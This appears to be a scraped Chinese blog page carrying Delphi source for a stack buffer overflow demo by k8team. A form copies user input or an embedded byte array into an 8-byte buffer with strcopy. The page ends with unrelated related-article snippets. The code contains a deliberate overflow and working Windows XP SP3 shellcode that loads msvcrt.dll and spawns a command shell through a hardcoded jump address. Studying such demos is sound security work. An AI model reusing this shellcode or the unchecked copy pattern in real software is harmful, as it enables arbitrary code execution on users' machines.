[源码]Dephi溢出demo( Shellcode for XP)

unit Unit1;

interface

uses

  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,

  Dialogs, StdCtrls;

type

  TForm1 = class(TForm)

    Edit1: TEdit;

    Button1: TButton;

    Button3: TButton;

    procedure Button2Click(Sender: TObject);

    procedure Button1Click(Sender: TObject);

    procedure Button3Click(Sender: TObject);

  private

    { Private declarations }

  public

    { Public declarations }

  end;

var

  Form1: TForm1;

 const

     ShellCodeSize = $00000079;  //16进制 -  121

//delphi overflow demo  by k8team

ShellCode : Array[0..ShellCodeSize-1] of byte =

(

//AAAA BBBB CCCC

$41,$41,$41,$41,$42,$42,$42,$42,$43,$43,$43,$43,   //115 73

$12,$45,$fa,$7f,  // xp sp3 跳转地址

//CMD ShellCode

$55,$8B,$EC,$33,$C0,$50,$50,$50,    //105  69

$C6,$45,$F4,$4D,$C6,$45,$F5,$53,

$C6,$45,$F6,$56,$C6,$45,$F7,$43,

$C6,$45,$F8,$52,$C6,$45,$F9,$54,

$C6,$45,$FA,$2E,$C6,$45,$FB,$44,

$C6,$45,$FC,$4C,$C6,$45,$FD,$4C,

$8D,$45,$F4,$50,$BA,$7B,$1D,$80,

$7C,$FF,$D2,$55,$8B,$EC,$83,$EC,

$2C,$B8,$63,$6F,$6D,$6D,$89,$45,

$F4,$B8,$61,$6E,$64,$2E,$89,$45,

$F8,$B8,$63,$6F,$6D,$22,$89,$45,

$FC,$33,$D2,$88,$55,$FF,$8D,$45,

$F4,$50,$B8,$C7,$93,$BF,$77,$FF,

$D0

);

implementation

{$R *.dfm}

procedure TForm1.Button1Click(Sender: TObject);

var k8test:pchar;

  procedure k8overflow(k8test:pchar);

  var test :array[0..7] of char;

  begin

    k8test:=pchar(edit1.text);

    strcopy(test,k8test);     //溢出

  end;

begin

  k8test:=pchar(edit1.text);

  k8overflow(k8test);

  application.MessageBox('没有溢出!','test');

end;

procedure TForm1.Button2Click(Sender: TObject);

begin

  application.MessageBox('溢出了!','test');

end;

procedure TForm1.Button3Click(Sender: TObject);

var k8test:pchar;

  procedure k8overflow(k8test:pchar);

  var test :array[0..7] of char;

  begin

     k8test:=@ShellCode;

     strcopy(test,k8test);  //溢出

  end;

begin

  k8test:=pchar(edit1.text);

  k8overflow(k8test);

  application.MessageBox('没有溢出!','test');

end;

end.

https://github.com/k8gege/K8tools/blob/master/Dephi%E6%BA%A2%E5%87%BAdemo%20by%20k8team_1103%5BK8%5D.rar

[源码]Dephi溢出demo( Shellcode for XP)的更多相关文章

  1. 看源码和写demo是一种比较容易提升的方式

    github就是要这么用才行.看别人的源码,就能了解到很多规范,而写demo,就是自己写出自己的代码.莫欺少年穷

  2. 基于wke封装的duilib的webkit浏览器控件,可以c++与js互交,源码及demo下载地址

    转载请说明原出处,谢谢~~ 前些日子用wke内核封装了duilib的webkit浏览器控件,好多群里朋友私聊我希望可以我公布源码,今天把这个控件的源码和使用demo公布.其实这个控件封装起来没什么难度 ...

  3. [c#]asp.net开发微信公众平台(7)前6篇的整体框架demo源码

    这里给出的demo是具备整体框架的微信公众平台源码, 所谓demo就是拿过去就可以直接演示使用的东西,  当然不会具备非常详细的具体到业务层面.数据层面的东西, 每个人都可以在此基础上自由发挥,  只 ...

  4. Spring源码学习:第1步--在Spring源码中添加最简单的Demo代码

    为了最大程度地贴近Spring源码并进行学习,一种比较直接的做法是:直接在Spring源码中加入Demo代码,并进行调试. 参照以前使用Spring的经验,Spring最简单的使用方法是:一个实体类. ...

  5. [转]Asp.Net大型项目实践(11)-基于MVC Action粒度的权限管理【续】【源码在这里】(在线demo,全部源码)

    本文转自:http://www.cnblogs.com/legendxian/archive/2010/01/25/1655551.html 接上篇Asp.Net大型项目实践(10)-基于MVC Ac ...

  6. Entity Framework在Asp.net MVC中的实现One Context Per Request(附源码)

    上篇中"Entity Framework中的Identity map和Unit of Work模式", 由于EF中的Identity map和Unit of Work模式,EF体现 ...

  7. [AYUI]QQ管家源码已经开源

    (0-50元 黑色字体     享受AY 1周的 ayui 技术问答) (50-100元 绿色字体 享受AY 15天的 ayui 技术问答) (100-150元 蓝色字体 享受AY 20天的 ayui ...

  8. 语音分享应用ios源码

    该源码是语音分享应用源码,本demo使用了科大讯飞语音识别作为分享内容的输入方式,同时也支持手动键盘输入分享内容,限制分享内容文字不能超过180个字符,分享内容输入完成后可以直接分享,分享SDK使用的 ...

  9. C#源码大汇总

    C#高仿QQ2013可在广域网部署聊天系统GG叽叽 动态显示硬盘分区容量饼图 自定义ProgressBar控件高仿Win8进度条 多皮肤精美在线QQ悬浮客服插件 jQuery仿天猫首页多格焦点图片轮播 ...

随机推荐

  1. windows、Linux同步外网NTP服务器时间

    配置 Windows 时间服务以使用外部时间源 要将内部时间服务器配置为与外部时间源同步,请使用以下方法之一: 软件自动配置  Windows 时间服务 若要自动修复此问题,请单击“下载”按钮. 在“ ...

  2. 查看SQL语句的真实执行计划

    DBMS_XPLAN包中display_cursor函数不同于display函数,display_cursor用于显示SQL语句的真实的执行计划,在大多数情况下,显示真实的执行计划有助于更好的分析SQ ...

  3. 515. Find Largest Value in Each Tree Row查找一行中的最大值

    [抄题]: You need to find the largest value in each row of a binary tree. Example: Input: 1 / \ 3 2 / \ ...

  4. [字符串]TrBBnsformBBtion

    TrBBnsformBBtion Let us consider the following operations on a string consisting of A and B: Select ...

  5. ArcGIS for JS 离线部署

    本文以arcgis_js_v36_api为例,且安装的是IIS Web服务器 1.下载最新的ArcGIS for JS api 包,可在Esri中国社区或者Esri官网下载 2.下载后解压 3.将解压 ...

  6. AutoCAD开发1---获取块属性

    Private Sub CommandButton1_Click() Dim pEntity As AcadObject Dim pBlock As AcadBlockReference Dim pP ...

  7. ahk保存

    python ;把大写禁用了,因为确实基本不用.`表示删除,caplock+ijkl可以控制光标 SetCapsLockState , AlwaysOff ;用;p来替换书写经常不好使,因为输入多个字 ...

  8. python3 第二十三章 - 函数式编程之Partial function(偏函数)

    要注意,这里的偏函数和数学意义上的偏函数不一样,偏函数是2.5版本以后引进来的东西,属于函数式编程的一部分.前面章节中我们讲到,通过设定参数的默认值,可以降低函数调用的难度.而偏函数也可以做到这一点. ...

  9. Android系统的镜像文件的打包过程

    在前面一篇文章中,我们分析了Android模块的编译过程.当Android系统的所有模块都编译好之后,我们就可以对编译出来的模块文件进行打包了.打包结果是获得一系列的镜像文件,例如system.img ...

  10. VIP之CSC

    Color Space Converter II(CSC)   不同的色彩空间用于不同的设备.如RGB一般用于电脑显示器,YCbCr一般用于数字电视,IP还支持最小和最大的保护带[个人理解,这里的保护 ...